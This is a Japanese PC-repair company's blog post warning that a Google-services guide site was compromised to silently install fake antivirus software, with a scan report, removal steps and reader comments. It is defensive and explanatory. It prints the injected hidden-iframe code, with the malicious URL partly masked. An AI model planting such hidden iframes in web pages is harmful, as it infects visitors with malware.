営業日のご案内

携帯サイト

エコ活動


GSL

オーシャンパソコンレスキューは植林活動を通しCO2の削減に取り組んでいます。

一般サイトも改竄されると攻撃サイトになってしまいます

特定サイトの非難になってしまう可能性があるので記事にしようか悩んだのですが、連絡が取れないことと、過去に他の方にも指摘がされているのにも関わらず、対策がとられていないようなので、被害者がこれ以上増えないようにしたいという事もあり今回の記事を紹介させていただきます。

事の始まりはgoogleさんで調べ物をしてたどり着いたGoogle Maniaというサイト。
このサイトではgoogleの各種サービスについて詳しい解説などがされていて、この関係としては結構人気があると思われます。
検索でも最上位に表示されるような状況なので知っている方も多いかもしれません。

改竄されてしまったサイト(Google Mania)

改竄されてしまったサイト(Google Mania)

ところがこのサイト長らくメンテナンス等されておらず放置状態となっています。
サイト自体も古いバージョンのCMSが利用されており既知の重大な脆弱性を持っているのですがメンテナンスされていない事もあって、悪意のある第3者によってサイトの改ざんが行われてしまっています。(ざっと確認しましたが全ページ改ざんされているようです)

6月頃に一度改ざんされて攻撃サイトと化してしまっていたようです(ソース)が、改ざんで埋め込まれたサイトが停止された事でいったんは落ち着いたようです。
(サイトメンテナンスによって改ざんされたわけではないようで、脆弱性はそのまま?)

今回2011年8月22日(今日)にアクセスしたわけですが、新しく改ざんされたかもしくは停止されたサイトが復帰したかの理由によりまたしても攻撃サイトと化しています。
しかも現時点(8月22日 17:00)でほとんどのセキュリティーソフトが検知できない新種の偽セキュリティソフトが勝手にPCにインストールされ実行されてしまうという状況なのです。

(改ざんされたサイト)
 Google Mania(google-mania.net)

(不正コード)
 <div style=”position: absolute; left: -1999px; top: -2999px;”><iframe src=”*ttp://kliemwrznr.co.**/i.php?go=1″ width=”3″ height=”3″></iframe></div>

(ウィルス検査結果)

=======================================
VirSCAN.org Scanned Report :
Scanned time   : 2011/08/22 17:14:43 (JST)
Scanner results: 5% のアンチウイルスが(2/37) マルウェアと判定しました
File Name      : 0.2367670180808894.exe
File Size      : 936448 byte
File Type      : PE32 executable for MS Windows (GUI) Intel 80386 32-bit
MD5            : 22f95e63e1e109d894149c6b9949d59f
SHA1           : 5e1c325627988ebe86ea3dae280764334442104b
Online report  : http://r.virscan.org/173025f2d056d40ef7d8ff2442d76494

Scanner        Engine Ver      Sig Ver            Scan result
a-squared      5.1.0.3         20110822060411     -
AhnLab V3      2011.08.22.02   2011.08.22         -
AntiVir        8.2.6.32        7.11.13.155        -
Antiy          2.0.18          20110804.11725727  -
Arcavir        2011            201107140423       -
Authentium     5.1.1           201108211932       -
AVAST!         4.7.4           110821-1           Win32:FakeAlert-AZL [Trj]
AVG            8.5.850         271.1.1/3849       -
BitDefender    7.90123.8954708 7.38720            -
ClamAV         0.97.1          13462              -
Comodo         5.1             9829               -
CP Secure      1.3.0.5         2011.08.19         -
Dr.Web         5.0.2.3300      2011.08.22         -
F-Prot         4.6.2.117       20110822           -
F-Secure       7.02.73807      2011.08.22.01      -
Fortinet       4.2.257         13.567             -
GData          22.1742         20110822           -
ViRobot        20110820        2011.08.20         -
Ikarus         T3.1.32.20.0    2011.08.22.79150   -
JiangMin       13.0.900        2011.08.21         -
Kaspersky      5.5.10          2011.08.22         -
KingSoft       2009.2.5.15     2011.8.22.14       -
McAfee         5400.1158       6445               -
Microsoft      1.7604          2011.08.22         -
NOD32          3.0.21          6398               -
Norman         6.07.10         6.07.00            -
Panda          9.05.01         2011.08.21         -
Trend Micro    9.200-1012      8.360.11           -
Quick Heal     11.00           2011.08.20         -
Rising         20.0            23.71.03.03        -
Sophos         3.22.0          4.68               Mal/FakeAV-LX
Sunbelt        3.9.2497.2      10238              -
Symantec       1.3.0.24        20110821.003       -
nProtect       20110821.01     12475755           -
The Hacker     6.7.0.1         v00282             -
VBA32          3.12.16.4       20110821.1017      -
VirusBuster    5.3.0.4         14.0.179.0/5952350 -
=======================================

検出できたものは「Win32:FakeAlert-AZL [Trj]」、「Mal/FakeAV-LX」として発見していますね。

偽セキュリティソフト(Security Protection)ですので自分を棚に上げて存在しないウィルスを大量に発見したかのように振る舞い
駆除するためにお金を払え(ソフトを購入しろ)という動作を行います。
攻撃手法の詳細は分かりませんが危険な状態ですね。

偽セキュリティソフト(Security Protection)

偽セキュリティソフト(Security Protection)

一度感染すると自分以外の常駐プログラムをどんどん強制終了させ、本物のセキュリティソフトも停止させられます。
また、偽セキュリティソフトを終了させようとタスクマネージャー等を立ち上げても強制終了させられてしまいます。
ということで一度動作し出すとシャットダウンするしかなくなります。
(偽セキュリティソフトが動いていますが意味がないですし、他の不正プログラムをネットから引っ張ってくる可能性もあります)

駆除は以下の方法で可能です。(幸い今回のケースは簡単でした)

  1. 感染を確認したら即時ネットワーク接続を切断しパソコンをシャットダウンします。
    有線接続の場合はケーブルを抜き、無線接続の場合は電波をOFFにするかアクセスポイントの接続を切断します。
  2. 再度電源を入れます。画面に何か表示されたらしばらくF8キーをトントン押し続けて下さい。
    詳細オプションの選択メニュー(またはWindows拡張オプションメニュー)が表示されます。
  3. 「セーフモード」を選択してWindowsを起動します。
  4. 偽セキュリティソフトの起動を停止
    スタート→すべてのプログラム→スタートアップ→に「Security Protection」という項目があるので
    マウスカーソルがこの上において 右クリック→削除
  5. デスクトップのショートカットなどを削除
    デスクトップ上に「Security Protection」というショートカットがあるので削除。
    また、でたらめなファイル名アイコンがある場合はこれも削除(これが偽セキュリティソフトのインストーラーです)。

    偽セキュリティソフトのアイコン

    偽セキュリティソフトのアイコン

  6. 偽セキュリティソフト本体を削除

    WindowsVista、7の場合
      C:\Users\(ログイン名)\AppData\Roaming\defender.exe

    WindowsXP,2000の場合
      C:\Documents and Settings\All Users\Application Data\defender.exe

    が偽セキュリティソフト本体なのでこれを削除

  7. 元の状態に戻す
    パソコンを再起動します。
    起動が終わったらネット接続を元に戻します(線を繋ぎ直す、または無線を再接続)。

以上です。
対象の箇所にファイルがない場合はファイル名でパソコン内を検索等してみて下さい。
(数日経てばほとんどのセキュリティソフトで対応できると思いますが。。。)

サイト管理者は自分のサイトに責任を持って管理していただきたいものですね。

昔のようにいわゆる危ないサイトにいかなければウィルスに感染しないという時代はとっくに終わっています。今回のようにウィルス対策ソフトのワクチンが間に合わない場合もありますが、それでも最低限の防御をしてより安全にインターネット等を楽しんでいただければと思います。

自信がない&原因が違うなどの場合は是非弊社にお預けください!
他社には断られたような事案も大歓迎。お困りのことがあったら、お気軽にご連絡ください。お見積もりは無料です。

Tel:0268-75-8270
または
お問い合わせ
よりご連絡ください。

関連性の高いと思われる記事:

トラックバック(Trackback)

トラックバックは管理者の承認後に表示されます。無関係な内容や、誹謗中傷、リンクだけで意見や感想のないものは承認されませんのでご了承ください。

5 comments to 一般サイトも改竄されると攻撃サイトになってしまいます

  • take

    お世話になります。本日まさにこのウイルスにやられました。上記サイトにアクセスしてすぐに勝手にスキャンをするソフトが立ち上がりました。あわててソフトを終了させたりし、ネットを閉じました。しかし他のスキャンソフトも動かず、スキャンを確認して駆除を使用とするとお金を払うサイトに誘導されました(その際はネットをつなげました)。
    セーフモードでは他のスキャンソフトが立ち上がったのでいろいろやっているとき、他の同僚がこのサイトを教えてくれました。おかげで助かりました。
    ちなみに自分のPC内での増殖や、復活などはないでしょうか?
    また相手のサイトに接続してしまいましたが、新たに進入される可能性はありますか?
    恐縮ですがお教え頂ければ幸いです。

    こちらのPCのスペックです。
    ウインドウズビスタ sp2
    富士通ビブロMGY
    IE8

    グーグルカレンダーの同期について調べているうちに上記「google mania]に行きました
    [roguekiller.exe]を使用して以下のログを確認し、2つのファイルを削除しました。
    (そちらでは[defender.exeのみのようなのですが、[RDrvMon.exe]というファイルも検知されたため削除しました(別の話かもしれません)。

    大変助かりました。ありがとうございました。
    take

  • オーシャンパソコンレスキュー

    お役に立つ事ができて幸いです。
    また、コメントいただきありがとうございます。

    先ほど再確認を行いましたところ弊社が先日確認していた攻撃サイトアドレスが別のものに変わっている事が確認できました。(もうやられ放題という感じですね)
    従いまして弊社のこの記事の内容では既に(1日経過していませんが…)異なる点が発生している可能性があります。

    弊社で確認できたものはその後復活も増殖もありませんが、このような状態なので確実に大丈夫という事は言えない状況です。

    現在でもまだ半数以上の大手ウィルススキャンソフトが対応できていない状況のようですので対策のとりようがないといった感もあります。
    念のためにJAVA、AdobeのPDF関連ソフト、IEは最新状態である事を今一度ご確認いただいた上で様子を見ていただければと思います。

    弊社でも新しい動き等が確認できましたら随時ご報告させていただこうと思っております。

  • take

    追加自己レスです。
    [RDrvMon.exe]は関係ありませんでした。
    take

  • オーシャンパソコンレスキュー

    追加の情報ありがとうございます。
    こうやってリアルタイムに必要な情報が追加・見られる事がインターネットの強みですね。
    同じ被害に遭われた方の正しい道しるべとなれるようサイトを充実できればと思います。
    また何かありましたら是非お声を届けていただければ幸いです。

  • オーシャンパソコンレスキュー

    記事投稿から2週間ほどが経過しましたが、相変わらず何の対策もとられていないようです。
    こちらでできることをしてみましたがどうにもなっていません。

    管理人への連絡(メール):音沙汰なし
    ホスティング業者:「契約者の責任」として「何もしない」との回答

    サイト管理者は他の運営サイトも運営を放棄しているような状態なのでもしかすると病気などで管理ができないのかもしれませんが、それでも現状は問題です。

    ホスティング業者もサイトが改ざんされ第三者に悪影響を長期間与えているのにもかかわらず何もしないというのは対応として絶対に間違っていると思います。
    (大抵、他社さんではなんらかの対応をしてもらえます。)

    1日に何度も改ざんにあっているこのような状態のサイトには絶対に訪れるべきではありません。

    みなさんお気をつけください。

コメント






利用できるHTMLタグ

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong> <img localsrc="" alt="">